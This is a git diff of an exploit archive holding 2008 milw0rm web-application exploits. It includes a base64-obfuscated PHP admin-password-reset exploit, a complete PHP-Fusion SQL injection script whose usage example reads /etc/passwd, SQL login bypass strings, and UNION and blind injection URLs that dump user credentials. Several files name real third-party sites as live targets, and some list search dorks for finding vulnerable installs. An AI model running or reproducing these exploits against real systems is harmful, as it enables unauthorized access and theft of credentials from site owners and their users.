+			"ZD1tZDUoJF9QT1NUWyducHcnXSk7JHBvc3Q9InNpdGVuYW1lPS0lMjB3ZWJwb3J0Zm9saW8lMjAt".
+			"Jl9zdGF0dXNiYXI9c3RhdHVzJTIwYmFyJmJhbm5lcj1jb3B5cmlnaHQmZW1haWw9bWFpbC5nYW5v".
+			"ayU0MGdtYWlsLmNvbSZwYXNzd29yZD0iLiRuZXdfcHdkLiImcGFzc3dvcmRfcmV0eXBlPSIuJG5l".
+			"d19wd2QuIlxyXG4iOyRqb2tlID0gIlBPU1QgLyIuJF9QT1NUWyJQQVRIIl0uIi9hZG1pbi91c2Vy".
+			"aW5mby5waHA/YWN0aW9uPWFjY291bnRfc2F2ZSBIVFRQLzEuMVxyXG5Ib3N0OiAiLiRfUE9TVFsi".
+			"TVNER05LIl0uIlxyXG5Vc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93".
+			"cyBOVCA1LjE7IGVuLVVTOyBydjoxLjkpIEdlY2tvLzIwMDgwNTI5MDYgRmlyZWZveC8zLjBcclxu".
+			"S2VlcC1BbGl2ZTogMzAwXHJcbkNvbm5lY3Rpb246IGtlZXAtYWxpdmVcclxuQ29udGVudC1UeXBl".
+			"OiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWRcclxuQ29udGVudC1MZW5ndGg6IDE5".
+			"MFxyXG5cclxuIi4kcG9zdDskcmVzID0gIiI7JGF0dGFjayA9IGZzb2Nrb3BlbigkX1BPU1RbIk1T".
+			"REdOSyJdLCI4MCIsJGVycm5vLCAkZXJyc3RyLCA1MCk7aWYoISRhdHRhY2spe2VjaG8oIjxiciAv".
+			"PldURiwgZXJyIzogKCRlcnJubykuJGVycnN0ciIpO3JldHVybjt9ZWNobygiPHNwYW4gc3R5bGU9".
+			"XCJmb250Om5vcm1hbCA4cHQgdGFob21hO1wiPlsrXSA8Yj5Db25uZWN0ZWQuLi48YnIvPjwvYj5b".
+			"K10gPGI+U2VuZGluZyByZXF1ZXN0Li4uPGJyLz48L2I+Iik7ZndyaXRlKCRhdHRhY2ssJGpva2Up".
+			"O3doaWxlKCFmZW9mKCRhdHRhY2spKXskcmVzLj1mZ2V0cygkYXR0YWNrKTt9ZmNsb3NlKCRhdHRh".
+			"Y2spO2lmIChzdHJpc3RyKCRyZXMsICJzYXZlZCIpKXtlY2hvICJbK108Yj4gRXhwbG9pdGVkICEg".
+			"LCA8Zm9udCBjb2xvcj1cInJlZFwiPlBhc3N3b3JkIGNoYW5nZWQuLi48L2I+PC9mb250PjxiciAv".
+			"PiAgICAgWytdIC4uLjxiciAvPiAgICAgWytdIDxiPm5ldyBwYXNzd29yZDo8L2I+ICIuJF9QT1NU".
+			"WyducHcnXS4iPGJyIC8+ICAgICBbK108Yj4gYWRtaW4gcGFuZWw6PC9iPiBodHRwOi8vIi4kX1BP".
+			"U1RbIk1TREdOSyJdLiRfUE9TVFsiUEFUSCJdLiIvYWRtaW4vPGJyIC8+PGJyIC8+PGJyIC8+PGJy".
+			"IC8+PGJyIC8+PGJyIC8+PGJyIC8+PHNwYW4gc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21h".
+			"O2NvbG9yOiNDQ0M7XCI+RXhwbG9pdCBCeSBHNE4wSy4uLjwvc3Bhbj4iO30gZWxzZSB7IGVjaG8g".
+			"IlsrXTxiPiBPb3BzLCBzcnksIG5vdCB2dWxuLi4uITwvYj48YnIgLz5bIV0gPGk+ZG91YmxlIGNo".
+			"ZWNrIHlvdXIgaW5wdXQuLi48L2k+Ijt9Zmx1c2goKTt9ZWxzZXtlY2hvJEZPUk07fQ0K";
+		eval(base64_decode($GNK));
+
+/*
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 <Tornado2800[at]gmail.com> // bedone in nemishe :D
+	[»] Hussain-X <darkangel_g85[at]yahoo.com> // Jazakallah...
+	[»] Str0ke //Hey Brotha keep rocking on ;)
+	[»] Saudi-L0rd,Sakab...
+	[»] SMN,MSD-KiD,SED,AMD,MSN...
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit();
+===============================================================================*/
+?>
+
+# milw0rm.com [2008-11-20]
diff --git a/platforms/php/webapps/7172.txt b/platforms/php/webapps/7172.txt
index 08943da8d..1b02f48c8 100755
--- a/platforms/php/webapps/7172.txt
+++ b/platforms/php/webapps/7172.txt
@@ -1,28 +1,28 @@
-[+] Script Name         : NATTERCHAT v1.1 remote login bypass
-
-[+] Author         : Bl@ckbe@rD ('Tunisian TerrorisT') 
-
-[+] Contact        : blackbeard-sql[A.T]hotmail{.}fr ;
-
-[+] Dork           : Powered by NATTERCHAT v 1.1
-
---//-->
-
-[+] Expl0iT :
-
-1) Go to the Login page http://www.exemple.ff/chat/nattechat/home.asp
-
-2) Username : admin  
-
-   Password : ' or '1'='1
-
-3) You are the Admin now!
-
-N.B : U can aplly an SQL query in both (Username or Password) but we done only ' or '1'='1 coz it's always true then we can simply bypass the login page
-
-
---//-->
-
-[+] Greetz : hak3r-b0y , Underz0ne Crew , king Of Hacker , Zigma , micro0x02 ... 
-
-# milw0rm.com [2008-11-20]
+[+] Script Name         : NATTERCHAT v1.1 remote login bypass
+
+[+] Author         : Bl@ckbe@rD ('Tunisian TerrorisT') 
+
+[+] Contact        : blackbeard-sql[A.T]hotmail{.}fr ;
+
+[+] Dork           : Powered by NATTERCHAT v 1.1
+
+--//-->
+
+[+] Expl0iT :
+
+1) Go to the Login page http://www.exemple.ff/chat/nattechat/home.asp
+
+2) Username : admin  
+
+   Password : ' or '1'='1
+
+3) You are the Admin now!
+
+N.B : U can aplly an SQL query in both (Username or Password) but we done only ' or '1'='1 coz it's always true then we can simply bypass the login page
+
+
+--//-->
+
+[+] Greetz : hak3r-b0y , Underz0ne Crew , king Of Hacker , Zigma , micro0x02 ... 
+
+# milw0rm.com [2008-11-20]
diff --git a/platforms/php/webapps/7173.php b/platforms/php/webapps/7173.php
index 059d28d16..bbe576bcf 100755
--- a/platforms/php/webapps/7173.php
+++ b/platforms/php/webapps/7173.php
@@ -1,147 +1,147 @@
-<?php
-/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
- PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit
- requires magic_quotes == off
-
- coded by irk4z[at]yahoo.pl
- homepage: http://irk4z.wordpress.com
-
- greets: all friends ;)
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/
-
-$host = $argv[1];
-$path = $argv[2];
-$login = $argv[3];
-$pass = $argv[4];
-$sql_injection = $argv[5];
-
-echo
-"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n".
-" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\n".
-" requires magic_quotes == off\n".
-"\n".
-" coded by irk4z[at]yahoo.pl\n".
-" homepage: http://irk4z.wordpress.com\n".
-"\n".
-" greets: all friends ;)\n".
-"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n";
-
-if(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){
-	echo "Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\n" .
-		 "       php $argv[0] localhost /php-fusion/ user s3cret \"SELECT database()\"\n".
-		 "       php $argv[0] localhost / user s3cret \"SELECT load_file(0x2F6574632F706173737764)\"\n\n";
-	die;
-}
-
-echo "Logging into system...";
-//login to php-fusion using login and pass
-$login_data = send($host, array(	"path" => $path."news.php",
-					"post" => array(
-							"user_name" => $login,
-							"user_pass" => $pass,
-							"login" => "Login"
-							)
-				)
-			);
-
-//get cookies
-preg_match_all("/Set-Cookie:[\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\.]+;)/", $login_data, $matches);
-$cookies = implode(' ', $matches[1]);
-
-//get user id
-preg_match_all("/([0-9])+.([a-zA-Z0-9]{32})/", $cookies, $matches);
-$my_id = $matches[1][0];
-
-if(empty($my_id)){
-	echo "\n[x] Incorrect login or password..";
-	die;
-} else {
-	echo "[ok]\n";
-}
-
-$id_message = uniqid();
-$inhex = '';
-for($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ;
-
-echo "Running sql-injection...\n";
-//running sql-injection
-$res = send($host, array(	"path" => $path."messages.php?msg_send={$my_id}%27%2F%2Axxx&",
-				"cookie" => $cookies,
-				"post" => array(
-						"send_message" => 'X',
-						"subject" => "X*/,0x{$inhex},								(SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*",
-						"message" => "XXX"
-						)
-			)
-		);
-
-echo "Getting data...\n\n";
-$res = send($host, array(	"path" => $path."messages.php?folder=outbox",
-				"cookie" => $cookies )
-			);
-
-preg_match_all("/msg_read=([0-9]+)'>{$id_message}<\/a>/", $res, $matches);
-$id_message_number = $matches[1][0];
-
-$res = send($host, array(	"path" => $path."messages.php?folder=outbox&msg_read=".$id_message_number,
-				"cookie" => $cookies )
-		);
-
-preg_match_all("/{$id_message}{$id_message}(.*){$id_message}{$id_message}/", $res, $matches);
-
-if( empty($matches[1][0]) ){
-	echo "[x] Failed... maybe SQL-INJ is incorrect?\n\n";
-} else {
-	$tmp = '';
-	$hex = $matches[1][0];
-	//unhex it!
-	for($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1]));
-	echo "DATA: \n".$tmp."\n\n";
-}
-
-echo "Deleting message...\n";
-
-$res = send($host, array(	"path" => $path."messages.php?folder=outbox&msg_id=".$id_message_number,
-				"cookie" => $cookies,
-				"post" => array (
-						"delete" => "Delete"
-						)
-			)
-		);
-
-//send http packet
-function send($host, $dane = "") {
-	$packet = (empty($dane['post']) ? "GET" : "POST") . " {$dane["path"]} HTTP/1.1\r\n";
-	$packet .= "Host: {$host}\r\n";
-	
-	if( !empty($dane['cookie']) ){
-		$packet .= "Cookie: {$dane['cookie']}\r\n";
-	}
-	
-	if( !empty($dane['post']) ){
-		$reszta_syfu = "";
-		foreach($dane['post'] as $tmp => $tmp2){
-			$reszta_syfu .= $tmp . "=" . $tmp2 . "&";
-		}
-		$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-		$packet .= "Connection: Close\r\n";
-		$packet .= "Content-Length: ".strlen($reszta_syfu)."\r\n\r\n";
-		$packet .= $reszta_syfu;
-	} else {
-		$packet .= "Connection: Close\r\n\r\n";
-	}
-
-	$o = @fsockopen($host, 80);
-	if(!$o){
-		echo "\n[x] No response...\n";
-		die;
-	}
-	fputs($o, $packet);
-	while (!feof($o)) $ret .= fread($o, 1024);
-	fclose($o);
-	return ($ret);
-}
-
-?>
-
-# milw0rm.com [2008-11-20]
+<?php
+/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
+ PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit
+ requires magic_quotes == off
+
+ coded by irk4z[at]yahoo.pl
+ homepage: http://irk4z.wordpress.com
+
+ greets: all friends ;)
+*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/
+
+$host = $argv[1];
+$path = $argv[2];
+$login = $argv[3];
+$pass = $argv[4];
+$sql_injection = $argv[5];
+
+echo
+"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n".
+" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\n".
+" requires magic_quotes == off\n".
+"\n".
+" coded by irk4z[at]yahoo.pl\n".
+" homepage: http://irk4z.wordpress.com\n".
+"\n".
+" greets: all friends ;)\n".
+"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n";
+
+if(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){
+	echo "Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\n" .
+		 "       php $argv[0] localhost /php-fusion/ user s3cret \"SELECT database()\"\n".
+		 "       php $argv[0] localhost / user s3cret \"SELECT load_file(0x2F6574632F706173737764)\"\n\n";
+	die;
+}
+
+echo "Logging into system...";
+//login to php-fusion using login and pass
+$login_data = send($host, array(	"path" => $path."news.php",
+					"post" => array(
+							"user_name" => $login,
+							"user_pass" => $pass,
+							"login" => "Login"
+							)
+				)
+			);
+
+//get cookies
+preg_match_all("/Set-Cookie:[\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\.]+;)/", $login_data, $matches);
+$cookies = implode(' ', $matches[1]);
+
+//get user id
+preg_match_all("/([0-9])+.([a-zA-Z0-9]{32})/", $cookies, $matches);
+$my_id = $matches[1][0];
+
+if(empty($my_id)){
+	echo "\n[x] Incorrect login or password..";
+	die;
+} else {
+	echo "[ok]\n";
+}
+
+$id_message = uniqid();
+$inhex = '';
+for($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ;
+
+echo "Running sql-injection...\n";
+//running sql-injection
+$res = send($host, array(	"path" => $path."messages.php?msg_send={$my_id}%27%2F%2Axxx&",
+				"cookie" => $cookies,
+				"post" => array(
+						"send_message" => 'X',
+						"subject" => "X*/,0x{$inhex},								(SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*",
+						"message" => "XXX"
+						)
+			)
+		);
+
+echo "Getting data...\n\n";
+$res = send($host, array(	"path" => $path."messages.php?folder=outbox",
+				"cookie" => $cookies )
+			);
+
+preg_match_all("/msg_read=([0-9]+)'>{$id_message}<\/a>/", $res, $matches);
+$id_message_number = $matches[1][0];
+
+$res = send($host, array(	"path" => $path."messages.php?folder=outbox&msg_read=".$id_message_number,
+				"cookie" => $cookies )
+		);
+
+preg_match_all("/{$id_message}{$id_message}(.*){$id_message}{$id_message}/", $res, $matches);
+
+if( empty($matches[1][0]) ){
+	echo "[x] Failed... maybe SQL-INJ is incorrect?\n\n";
+} else {
+	$tmp = '';
+	$hex = $matches[1][0];
+	//unhex it!
+	for($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1]));
+	echo "DATA: \n".$tmp."\n\n";
+}
+
+echo "Deleting message...\n";
+
+$res = send($host, array(	"path" => $path."messages.php?folder=outbox&msg_id=".$id_message_number,
+				"cookie" => $cookies,
+				"post" => array (
+						"delete" => "Delete"
+						)
+			)
+		);
+
+//send http packet
+function send($host, $dane = "") {
+	$packet = (empty($dane['post']) ? "GET" : "POST") . " {$dane["path"]} HTTP/1.1\r\n";
+	$packet .= "Host: {$host}\r\n";
+	
+	if( !empty($dane['cookie']) ){
+		$packet .= "Cookie: {$dane['cookie']}\r\n";
+	}
+	
+	if( !empty($dane['post']) ){
+		$reszta_syfu = "";
+		foreach($dane['post'] as $tmp => $tmp2){
+			$reszta_syfu .= $tmp . "=" . $tmp2 . "&";
+		}
+		$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+		$packet .= "Connection: Close\r\n";
+		$packet .= "Content-Length: ".strlen($reszta_syfu)."\r\n\r\n";
+		$packet .= $reszta_syfu;
+	} else {
+		$packet .= "Connection: Close\r\n\r\n";
+	}
+
+	$o = @fsockopen($host, 80);
+	if(!$o){
+		echo "\n[x] No response...\n";
+		die;
+	}
+	fputs($o, $packet);
+	while (!feof($o)) $ret .= fread($o, 1024);
+	fclose($o);
+	return ($ret);
+}
+
+?>
+
+# milw0rm.com [2008-11-20]
diff --git a/platforms/php/webapps/7175.txt b/platforms/php/webapps/7175.txt
index 4892429cd..e45b8e181 100755
--- a/platforms/php/webapps/7175.txt
+++ b/platforms/php/webapps/7175.txt
@@ -1,13 +1,13 @@
-[+] Script Name         : Natterchat v1.12 (Auth Bypass) Remote SQL Injection Vulnerability
-[+] Author         : Mountassif Moad
-[+] Dork           : Powered by Natterchat v1.12
-
-[+] Expl0iT :
-1) Go to the Login page http://www.site.il/chat/nattechat/home.asp
-2) Username : admin 
-   Password : ' or '1'='1
-
-Live Demo
-http://www.sprq.ca/cgi-bin/natterchat/chat.asp
-
-# milw0rm.com [2008-11-20]
+[+] Script Name         : Natterchat v1.12 (Auth Bypass) Remote SQL Injection Vulnerability
+[+] Author         : Mountassif Moad
+[+] Dork           : Powered by Natterchat v1.12
+
+[+] Expl0iT :
+1) Go to the Login page http://www.site.il/chat/nattechat/home.asp
+2) Username : admin 
+   Password : ' or '1'='1
+
+Live Demo
+http://www.sprq.ca/cgi-bin/natterchat/chat.asp
+
+# milw0rm.com [2008-11-20]
diff --git a/platforms/php/webapps/7176.txt b/platforms/php/webapps/7176.txt
index 503e3b58e..848908fd1 100755
--- a/platforms/php/webapps/7176.txt
+++ b/platforms/php/webapps/7176.txt
@@ -1,42 +1,42 @@
-[>] Name:-->             ToursManager PhP Script <= Blind Sql Injection
- 
-[>] Discovered by:-->  XaDoS
- 
-[>] ContacT m&:-->     xados[at]hotmail.it
- 
-[>] Site:-->                http://www.toursmanager.com
- 
-#########
- 
-[■] £XpLoIT:
- 
-|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1--   (true)
- 
-|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0--   (false)
- 
-Version:
-|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5  (true)
-|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4  (false)
- 
-V=> 5.x.x XD
- 
-#########
-[â– ] D&M0:
- 
-|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
- 
-|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
- 
-|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5 
- 
-#########
- 
-[â– ] Th4Nks T0:
- 
-\> Boom3rang </ (very kind) ;-)
-\> Langy  </
-\> Str0ke </
- 
-#########
-
-# milw0rm.com [2008-11-20]
+[>] Name:-->             ToursManager PhP Script <= Blind Sql Injection
+ 
+[>] Discovered by:-->  XaDoS
+ 
+[>] ContacT m&:-->     xados[at]hotmail.it
+ 
+[>] Site:-->                http://www.toursmanager.com
+ 
+#########
+ 
+[■] £XpLoIT:
+ 
+|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1--   (true)
+ 
+|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0--   (false)
+ 
+Version:
+|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5  (true)
+|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4  (false)
+ 
+V=> 5.x.x XD
+ 
+#########
+[â– ] D&M0:
+ 
+|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
+ 
+|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
+ 
+|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5 
+ 
+#########
+ 
+[â– ] Th4Nks T0:
+ 
+\> Boom3rang </ (very kind) ;-)
+\> Langy  </
+\> Str0ke </
+ 
+#########
+
+# milw0rm.com [2008-11-20]
diff --git a/platforms/php/webapps/7179.txt b/platforms/php/webapps/7179.txt
index 738117e15..8c23f7597 100755
--- a/platforms/php/webapps/7179.txt
+++ b/platforms/php/webapps/7179.txt
@@ -1,13 +1,13 @@
-==============================================================================
- NATTERCHAT v1.1  Admin Home Bypass Vulnerability
-==============================================================================
- [»] Script  :          [ NATTERCHAT v1.1  ]
- [»] Discover:          [ Mountassif Moad  ]
-
-===[ XPL ]===
- [»] http://localhost/[path]/admin/home.php
-===[ LIVE ]===
- [»] http://www.welfarerights.net/natterchat/admin/home.asp
- [»] http://www.natterchat.co.uk/version11/admin/home.asp
-
-# milw0rm.com [2008-11-20]
+==============================================================================
+ NATTERCHAT v1.1  Admin Home Bypass Vulnerability
+==============================================================================
+ [»] Script  :          [ NATTERCHAT v1.1  ]
+ [»] Discover:          [ Mountassif Moad  ]
+
+===[ XPL ]===
+ [»] http://localhost/[path]/admin/home.php
+===[ LIVE ]===
+ [»] http://www.welfarerights.net/natterchat/admin/home.asp
+ [»] http://www.natterchat.co.uk/version11/admin/home.asp
+
+# milw0rm.com [2008-11-20]
diff --git a/platforms/php/webapps/7180.txt b/platforms/php/webapps/7180.txt
index 34349c9d9..c1de56041 100755
--- a/platforms/php/webapps/7180.txt
+++ b/platforms/php/webapps/7180.txt
@@ -1,47 +1,47 @@
-[ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +]
-
-[+] Vcalendar_asp Mdb Vulnerability
-[+]
-[+] ----------------------------------------------------------
-[+] Author : Swan
-[+]
-[+] Date : 20.11.2008
-[+]
-[+] Contact : Swantska@Gmail.Com
-[+]
-[+] -----------------------------------------------------------
-
-Script : Vcalendar_asp
-
-Download : http://www.aspindir.com/indir.asp?id=4048&sIslem=Indir
-
-Dork : "inurl:vcalendar_asp"
-
-Our mdb path : db/VCalendar.mdb
-
-Exploit :
-
-Step 1 - http://www.[target].com/[path]/vcalendar_asp/db/VCalendar.mdb
-
-Step 2 - Download that mdb file and read admin name & pass from "users" table.
-
-Step 3 - http://www.[target].com/[path]/vcalendar_asp/login.asp
-
-Example :
-
-http://www.soest.hawaii.edu/asp/vcalendar_asp/index.asp
-
-http://www.soest.hawaii.edu/asp/vcalendar_asp/db/VCalendar.mdb
-
-http://www.soest.hawaii.edu/asp/vcalendar_asp/login.asp
-
-[+] ----------------------------------------------------------------------
-[+] Special Thanks : str0ke & Turkish Nation
-[+]
-[+] Zone-h.Org & Milw0rm.Com
-[+]
-[+] ----------------------------------------------------------------------
-
-[ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +]
-
-# milw0rm.com [2008-11-20]
+[ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +]
+
+[+] Vcalendar_asp Mdb Vulnerability
+[+]
+[+] ----------------------------------------------------------
+[+] Author : Swan
+[+]
+[+] Date : 20.11.2008
+[+]
+[+] Contact : Swantska@Gmail.Com
+[+]
+[+] -----------------------------------------------------------
+
+Script : Vcalendar_asp
+
+Download : http://www.aspindir.com/indir.asp?id=4048&sIslem=Indir
+
+Dork : "inurl:vcalendar_asp"
+
+Our mdb path : db/VCalendar.mdb
+
+Exploit :
+
+Step 1 - http://www.[target].com/[path]/vcalendar_asp/db/VCalendar.mdb
+
+Step 2 - Download that mdb file and read admin name & pass from "users" table.
+
+Step 3 - http://www.[target].com/[path]/vcalendar_asp/login.asp
+
+Example :
+
+http://www.soest.hawaii.edu/asp/vcalendar_asp/index.asp
+
+http://www.soest.hawaii.edu/asp/vcalendar_asp/db/VCalendar.mdb
+
+http://www.soest.hawaii.edu/asp/vcalendar_asp/login.asp
+
+[+] ----------------------------------------------------------------------
+[+] Special Thanks : str0ke & Turkish Nation
+[+]
+[+] Zone-h.Org & Milw0rm.Com
+[+]
+[+] ----------------------------------------------------------------------
+
+[ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +] [ - _ +]
+
+# milw0rm.com [2008-11-20]
diff --git a/platforms/php/webapps/7182.txt b/platforms/php/webapps/7182.txt
index 56178f15b..66fcf60ec 100755
--- a/platforms/php/webapps/7182.txt
+++ b/platforms/php/webapps/7182.txt
@@ -1,18 +1,18 @@
-###################################################################################################################
-#Author: Ded MustD!e
-###################################################################################################################
-#Google Dork: com_thyme
-###################################################################################################################
-#Exploit: http://www.site.com/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*
-###################################################################################################################
-#Example: http://www.orlandoprofessionals.org/index.php?option=com_thyme&calendar=1&category=0&d=25&m=10&y=2008&Itemid=67&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*
-###################################################################################################################
-
-<creationDate>10/10/2005</creationDate>
-<author>eXtrovert software</author>
-<copyright>eXtrovert software</copyright>
-<authorEmail>thyme@extrosoft.com</authorEmail>
-<authorUrl>www.extrosoft.com</authorUrl>
-<version>1.0</version>
-
-# milw0rm.com [2008-11-21]
+###################################################################################################################
+#Author: Ded MustD!e
+###################################################################################################################
+#Google Dork: com_thyme
+###################################################################################################################
+#Exploit: http://www.site.com/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*
+###################################################################################################################
+#Example: http://www.orlandoprofessionals.org/index.php?option=com_thyme&calendar=1&category=0&d=25&m=10&y=2008&Itemid=67&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users/*
+###################################################################################################################
+
+<creationDate>10/10/2005</creationDate>
+<author>eXtrovert software</author>
+<copyright>eXtrovert software</copyright>
+<authorEmail>thyme@extrosoft.com</authorEmail>
+<authorUrl>www.extrosoft.com</authorUrl>
+<version>1.0</version>
+
+# milw0rm.com [2008-11-21]
diff --git a/platforms/php/webapps/7184.txt b/platforms/php/webapps/7184.txt
index b27ace204..31e4eb2b8 100755
--- a/platforms/php/webapps/7184.txt
+++ b/platforms/php/webapps/7184.txt
@@ -1,49 +1,49 @@
-=========================================================================================
-
-
-  [o] ZoGo-Shop e107 plugins 1.15.4 SQL Injection Vulnerability
-
-       Software : ZoGo-Shop plugin version 1.15.4
-       Vendor   : http://e107.org/
-       Download : http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.89
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
-
-
-=========================================================================================
-
-
-  [o] Vulnerable file
-
-       e107_plugins/zogo-shop/product_details.php
-
-        $product_ID=$_GET["product"];
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/e107_plugins/zogo-shop/product_details.php?product=[SQL]
-
-
-
-  [o] Dork
-
-       "Powered by ZoGo-Shop" or "e107_plugins/zogo-shop/product_details.php"
-
-
-=========================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/blog/]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11 martfella
-       skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-        
-=========================================================================================
-
-# milw0rm.com [2008-11-22]
+=========================================================================================
+
+
+  [o] ZoGo-Shop e107 plugins 1.15.4 SQL Injection Vulnerability
+
+       Software : ZoGo-Shop plugin version 1.15.4
+       Vendor   : http://e107.org/
+       Download : http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.89
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+
+
+=========================================================================================
+
+
+  [o] Vulnerable file
+
+       e107_plugins/zogo-shop/product_details.php
+
+        $product_ID=$_GET["product"];
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/e107_plugins/zogo-shop/product_details.php?product=[SQL]
+
+
+
+  [o] Dork
+
+       "Powered by ZoGo-Shop" or "e107_plugins/zogo-shop/product_details.php"
+
+
+=========================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/blog/]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11 martfella
+       skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+        
+=========================================================================================
+
+# milw0rm.com [2008-11-22]
diff --git a/platforms/php/webapps/7185.php b/platforms/php/webapps/7185.php
index 33af26330..b11b37d3c 100755
--- a/platforms/php/webapps/7185.php
+++ b/platforms/php/webapps/7185.php
@@ -1,139 +1,139 @@
-#!/usr/bin/php
-<?php
-
-print_r('
-+---------------------------------------------------------------------------+
-Discuz! Reset User Password Exploit
-by 80vul
-team: http://www.80vul.com
-+---------------------------------------------------------------------------+
-');
-
-if ($argc < 6) {
-print_r('
-+---------------------------------------------------------------------------+
-Usage: php '.$argv[0].' host path user mail uid
-host: target server (ip/hostname)
-path: path to discuz
-user: user login name
-mail: user login mail
-uid: user login id
-Example:
-php '.$argv[0].' localhost /discuz/ 80vul 80vul@80vul.com 2
-+---------------------------------------------------------------------------+
-');
-exit;
-}
-
